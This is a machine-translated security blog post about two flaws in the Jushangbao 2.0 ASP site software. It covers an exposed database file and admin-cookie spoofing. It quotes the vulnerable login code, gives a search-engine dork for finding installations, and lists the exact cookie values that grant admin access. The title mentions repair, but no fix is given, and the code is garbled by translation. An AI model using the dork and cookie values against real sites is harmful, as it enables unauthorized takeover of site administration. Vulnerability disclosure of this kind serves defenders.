Jushangbao 2.0 violent library and cookies spoofing defects and repair

FROM www.st999.cn/blog BY long time computer

Program: jushangbao 2.0

Google Keyword: intext: technical support: benming technology jushangbao

A few days ago, I met a program called jushangbao and downloaded the source code. Today, I have a simple look at it...

Vulnerabilities: brute-force library and background cookie Spoofing

1) directly access the conn/conn. asp exposed database address, download, decrypt, and log on to the background

2) Cookie spoofing: the code snippets in the check. asp file in the admin Folder:

Dim uid, upwd www.2cto.com
Uid = Replace_Text (Request. Form ("userid "))
Upwd = md5 (Replace_Text (Request. Form ("password"), 16)
Verifycode = Replace_Text (request. Form ("verifycode "))
 
If not isnumeric (Verifycode) then
Call Logerr ()
Call ErroFy ()
End if

If Cint (Verifycode) <> Session ("SafeCode") then
Call ErroFy ()
Sub ErroFy ()
Response. write "<table cellpadding = 2 cellspacing = 1 border = 0 width = 100% class = tableBorder align = center>"
Response. write "<TR>"
Response. write "<TH class = tableHeaderText colSpan = 2 height = 25> error prompt </TH>"
Response. write "<TR> <tr> <td height = 85 valign = top class = forumRow> <div align = center> <br> Incorrect verification code! </Div> </td> </tr>"
Response. write "<tr align = center> <td height = 30 class = forumRowHighlight> <a href = 'login. asp '> & lt; return to the previous page </a> </td>"
Response. write "</tr>"
Response. write "</table>"
Response. End ()
End Sub
Else

Set rs = server. createobject ("adodb. recordset ")
Sqltext = "select * from benming_master where Username = '" & uid & "' and [PassWord] = '" & upwd &"'"
Rs. open sqltext, conn, 1, 1
If Rs. Eof And Rs. Bof Then

Response. write "<table cellpadding = 2 cellspacing = 1 border = 0 width = 100% class = tableBorder align = center>"
Response. write "<TR>"
Response. write "<TH class = tableHeaderText colSpan = 2 height = 25> error prompt </TH>"
Response. write "<TR> <tr> <td height = 85 valign = top class = forumRow> <div align = center> <br> incorrect login name or password! </Div> </td> </tr>"
Response. write "<tr align = center> <td height = 30 class = forumRowHighlight> <a href = 'login. asp '> & lt; return to the previous page </a> </td>"
Response. write "</tr>"
Response. write "</table>"

Else
Response. Cookies ("globalecmaster") = rs ("username ")
Response. Cookies ("masterflag") = rs ("flag ")
Response. Cookies ("adminid") = rs ("id ")
LastLogin = Date ()
LastLoginIP = getIP ()
SQL = "update benming_master set LastLogin = '" & LastLogin & "', LastLoginIP = '" & LastLoginIP & "'where username ='" & uid &"'"

Conn.exe cute (SQL)
Response. write "<table cellpadding = 2 cellspacing = 1 border = 0 width = 100% class = tableBorder align = center>"
Response. write "<TR>"
Response. write "<TH class = tableHeaderText colSpan = 2 height = 25> logon success prompt </TH>"
Response. write "<TR> <tr> <td height = 85 valign = top class = forumRow> <div align = center> <br> the website administrator is successfully authenticated! <Br> automatically enters the background in 2 seconds... </div> </td> </tr>"
Response. write "<tr align = center> <td height = 30 class = forumRowHighlight> <a href = 'index. asp '> go to the background management </a> </td>"
Response. write "</tr>"
Response. write "</table>"
%>
<Meta HTTP-EQUIV = refresh Content = '2; url = index. asp '>
<%
End if
Rs. close
Set rs = nothing
End if

 

Method of exploits: access the background directly with AD, modify the following cookie, and then Access admin/index. asp to log on.

Globalecmaster = admin; masterflag = 01% 2C % 2002% 2C % 2003% 2C % 2004%

2C % 2005% 2C % 2006% 2C % 2007% 2C % 2008% 2C % 2009% 2C % 20010; adminid = 1